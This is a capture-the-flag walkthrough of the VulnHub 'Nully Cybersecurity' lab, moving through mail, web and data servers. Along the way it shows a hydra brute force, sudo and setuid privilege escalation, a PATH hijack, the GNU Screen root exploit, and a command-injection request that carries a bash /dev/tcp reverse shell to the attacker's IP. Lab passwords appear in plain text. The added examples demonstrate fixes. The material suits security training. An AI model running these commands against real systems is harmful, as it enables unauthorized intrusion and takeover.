nully-cybersecurity port forwarding
https://www.vulnhub.com/entry/nully-cybersecurity-1,549/
Nully Cybersecurity - this is an easy-intermediate realistic machine.
While working with the machine, you will need to brute-force, pivot (using metasploit, via portfwd), exploit a web app, and use searchsploit.
About: Wait 5-8 minutes before starting for the machine to start its services. Also, check the welcome page on port 80.
Hints: 'cat rockyou.txt | grep bobby > wordlist' for generating the wordlist.
Story: You are a Professional White Hat. Small company Nully Cybersecurity hired you to conduct a security test of their internal corporate systems.
0- With hydra we brute-force bob's SSH password (the service exposed on port 2222), using the wordlist built from the hint.
We get in.
The internal IP is 172.17.0.3. We know we have to root 3 servers (mail, web, data) and we are on the mail server.
We run nmap 172.17.0.0/24 to map the internal network (the header line of the first scan report did not survive in the notes):
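The wordlist step and the hydra run, as an added example that is not part of the original writeup. Target 192.168.2.107:2222 and the user bob are taken from the writeup; the rockyou.txt path is assumed and the sample password lines are constructed so the wordlist step can be exercised offline.

```shell
# Added example (not from the original writeup): build the wordlist the
# hint describes and run the SSH brute force with hydra.
# Assumptions: rockyou.txt location, target 192.168.2.107:2222 and user
# "bob" come from the writeup; the sample rockyou lines below are constructed.

# make_wordlist ROCKYOU PATTERN OUT
# Keeps every candidate containing PATTERN (substring match, like the hint's
# "grep bobby") and drops duplicates so hydra never retries the same password.
# Prints the number of candidates written.
make_wordlist() {
    grep -- "$2" "$1" | sort -u > "$3"
    wc -l < "$3" | tr -d ' '
}

# bruteforce_ssh HOST PORT USER WORDLIST
# -t 4 is the parallelism hydra itself recommends for ssh: more concurrent
# sessions trip sshd's MaxStartups limit and produce false negatives.
bruteforce_ssh() {
    command -v hydra >/dev/null 2>&1 || { echo "hydra not installed" >&2; return 2; }
    hydra -l "$3" -P "$4" -t 4 -s "$2" "$1" ssh
}

# Constructed stand-in for rockyou.txt; the real file would be
# /usr/share/wordlists/rockyou.txt on Kali.
demo() {
    tmp=$(mktemp -d)
    printf '%s\n' 123456 bobby bobby1 iloveyou bobbyboy bobby bobbybrown > "$tmp/rockyou.txt"
    make_wordlist "$tmp/rockyou.txt" bobby "$tmp/wordlist"
    cat "$tmp/wordlist"
    # Real run (needs network access to the target):
    # bruteforce_ssh 192.168.2.107 2222 bob "$tmp/wordlist"
    rm -rf "$tmp"
}
```

The substring match is deliberate: the hint is that bob's password contains "bobby", not that it equals it, so a plain `grep` without `-x` is what produces the candidate list.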
PORT STATE SERVICE
80/tcp open http
110/tcp open pop3
2222/tcp open EtherNetIP-1
8000/tcp open http-alt
9000/tcp open cslistener
MAC Address: 02:42:74:EA:1F:9C (Unknown)
Nmap scan report for 172.17.0.2
Host is up (0.000024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:42:AC:11:00:02 (Unknown)
Nmap scan report for 172.17.0.4
Host is up (0.000014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
8000/tcp open http-alt
9000/tcp open cslistener
MAC Address: 02:42:AC:11:00:04 (Unknown)
Nmap scan report for 172.17.0.5
Host is up (0.000022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
MAC Address: 02:42:AC:11:00:05 (Unknown)
Nmap scan report for MailServer (172.17.0.3)
Host is up (0.0000060s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
110/tcp open pop3
143/tcp open imap
1- Root the mail server, starting as bob
bob@MailServer:/opt/scripts$ sudo -l
Matching Defaults entries for bob on MailServer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on MailServer:
(my2user) NOPASSWD: /bin/bash /opt/scripts/check.sh
check.sh is writable by bob, so we replace its contents with a shell and run it as my2user (the setrlimit warning is harmless):
bob@MailServer:/opt/scripts$ echo '/bin/bash' > check.sh
bob@MailServer:/opt/scripts$ sudo -u my2user /bin/bash /opt/scripts/check.sh
sudo: setrlimit(RLIMIT_CORE): Operation not permitted
my2user@MailServer:/opt/scripts$ id
uid=1001(my2user) gid=1001(my2user) groups=1001(my2user)
my2user@MailServer:/opt/scripts$ sudo -l
Matching Defaults entries for my2user on MailServer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User my2user may run the following commands on MailServer:
(root) NOPASSWD: /usr/bin/zip
zip as root: -T tells zip to test the archive and -TT sets the command used for the test, so zip runs sh as root (the GTFOBins zip/sudo technique):
my2user@MailServer:/opt/scripts$ TF=$(mktemp -u)
my2user@MailServer:/opt/scripts$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 33%)
# id
uid=0(root) gid=0(root) groups=0(root)
2- Web server: we guess it is 172.17.0.2
bob@MailServer:~$ curl 172.17.0.2
<html>
<head>
<title>Nully Cybersecurity</title>
</head>
<body>
<h1 align="center">Under Construction</h1>
<p>So, there should be a website here, but it's still under construction. -Oliver</p>
</body>
</html>
bob@MailServer:~$
To fuzz it from our own machine we open a local port forward through the SSH session to bob (-N: no remote command, -f: go to background), then point ffuf at the forwarded port with any directory wordlist:
sudo ssh -L 127.0.0.1:8888:172.17.0.2:80 bob@192.168.2.107 -p 2222 -f -N
ffuf -u http://127.0.0.1:8888/FUZZ -w /usr/share/wordlists/dirb/common.txt
We discover /ping/ping.php, whose host parameter is passed straight to a shell (command injection). With a netcat listener waiting on port 9998 of our machine (192.168.2.84) we make the following call, whose decoded payload is 192.168.2.75;bash -c 'bash -i >& /dev/tcp/192.168.2.84/9998 0>&1':
curl '127.0.0.1:8888/ping/ping.php?host=192.168.2.75%3Bbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.84%2F9998%200%3E%261%27'
and get a reverse shell.
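The bug class behind that request and its fix, as an added example that is not the machine's own ping.php (the writeup does not show its source). The handler is rebuilt as shell functions so it runs offline; the real ping is replaced by an echo so no packets are sent, and "echo INJECTED" stands in for the reverse-shell command.

```shell
# Added example (not the original ping.php): the command-injection pattern
# behind the ping.php call, and a hardened version, as shell functions.
# The network ping is replaced by an echo so the demo has no side effects.

# vuln_ping HOST
# Mirrors the bug: the user-supplied host is spliced into a command string
# that is handed to a shell, so ';', '|', '$(...)' and friends are interpreted.
vuln_ping() {
    sh -c "echo ping -c 1 $1"
}

# safe_ping HOST
# Hardened version: allow-list the characters a hostname or IP may contain,
# never pass the value through a shell, and end option parsing with "--"
# so a host such as "-f" cannot be taken as a flag.
safe_ping() {
    case "$1" in
        ''|*[!A-Za-z0-9.-]*|-*) echo "rejected host: $1" >&2; return 1 ;;
    esac
    echo ping -c 1 -- "$1"
}

# The writeup's payload, URL-decoded, with 'echo INJECTED' in place of the
# reverse shell.
demo() {
    vuln_ping '192.168.2.75;echo INJECTED'          # second line printed: INJECTED
    safe_ping '192.168.2.75;echo INJECTED' || echo "blocked"
    safe_ping 192.168.2.75
}
```

In PHP the equivalent fix is to validate with the same allow-list (or filter_var with FILTER_VALIDATE_IP) and wrap the value in escapeshellarg before it reaches shell_exec; the allow-list is the part that matters, escaping alone still lets "-f" through as a flag.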
In the backups we find oliver's password: 4hppfvhb9pW4E4OrbMLwPETRgVo2KyyDTqGF
We cannot switch user from the reverse shell, so on our machine we also forward the web server's SSH port:
sudo ssh -L 127.0.0.1:2223:172.17.0.2:22 bob@192.168.2.107 -p 2222 -f -N
and log in as oliver over SSH:
ssh oliver@127.0.0.1 -p 2223
We need to escalate to oscar, who owns a setuid copy of python3. We exec a shell from it with -p so the shell keeps the effective uid instead of dropping back to oliver:
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
We become oscar and find his password: H53QfJcXNcur9xFGND3bkPlVlMYUrPyBp76o
There is a setuid binary, current-date, that can take us to root.
We copy it out with scp to analyze it in Ghidra:
scp current-date kali@192.168.2.84:~/current-date
It simply runs date without an absolute path, so all it takes is a fake date in the current directory and an empty entry at the front of PATH (the shell resolves an empty entry as the current directory):
oscar@WebServer:~/scripts$ echo '/bin/bash' > date
oscar@WebServer:~/scripts$ chmod +x date
oscar@WebServer:~/scripts$ export PATH=:$PATH
oscar@WebServer:~/scripts$ ./current-date
root@WebServer:~/scripts# id
uid=0(root) gid=0(root) groups=0(root),1000(oscar)
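The PATH hijack used against current-date, reproduced as an added example that is not part of the writeup. It assumes current-date resolved "date" through a PATH lookup, as the successful hijack above implies; a plain shell command stands in for the binary and no setuid bit is involved. The point worth keeping: setuid execution drops LD_PRELOAD and friends, but PATH is inherited untouched, so a privileged program that calls a command by bare name is only as safe as the caller's environment.

```shell
# Added example (not from the writeup): reproduce the PATH hijack against
# current-date with a stand-in for the SUID binary, and show the fix.
# Assumption: current-date ran "date" via a PATH lookup, as the successful
# hijack implies; no real setuid binary is used here.

# lookup_date_relative DIR
# Behaves like the vulnerable binary: after the caller prepends an empty
# entry to PATH (":$PATH"), the shell treats that entry as the current
# directory, so a ./date in DIR wins over /bin/date.
lookup_date_relative() {
    ( cd "$1" && export PATH=":$PATH" && date )
}

# lookup_date_absolute DIR
# The fix: call the program by absolute path (and, in a real setuid binary,
# reset PATH to a fixed value), so nothing under the caller's control is
# searched. Prints only the year to keep the output easy to check.
lookup_date_absolute() {
    ( cd "$1" && export PATH=":$PATH" && /bin/date +%Y )
}

# make_trap
# Builds the same trap oscar used: an executable named "date" in a fresh
# directory. A shebang is added here; the writeup relied on the kernel's
# ENOEXEC fallback, which also works.
make_trap() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/date"
    chmod +x "$dir/date"
    echo "$dir"
}

demo() {
    dir=$(make_trap)
    lookup_date_relative "$dir"    # HIJACKED
    lookup_date_absolute "$dir"    # the real year, from /bin/date
    rm -rf "$dir"
}
```

The same mistake explains why sudo sets secure_path in the sudoers output earlier on this page: a privileged context must not trust the unprivileged caller's PATH.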
3- Data server
172.17.0.5 is the data server. Over anonymous FTP we grab a hidden backup.zip, crack it with john (zip2john to extract the hash, then john with the wordlist) and get credentials:
donald:HBRLoCZ0b9NEgh8vsECS
We log in and find a SUID screen binary; we use the GNU Screen 4.5.0 local root exploit (it drops a libhax.so, injects it through /etc/ld.so.preload and builds a setuid rootshell):
https://www.exploit-db.com/exploits/41154
donald@DatabaseServer:~$ id
uid=1000(donald) gid=1000(donald) groups=1000(donald)
donald@DatabaseServer:~$ cd /tmp
donald@DatabaseServer:/tmp$ ls
conftest6257 libhax.c libhax.so rootshell rootshell.c screens
donald@DatabaseServer:/tmp$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),1000(donald)
#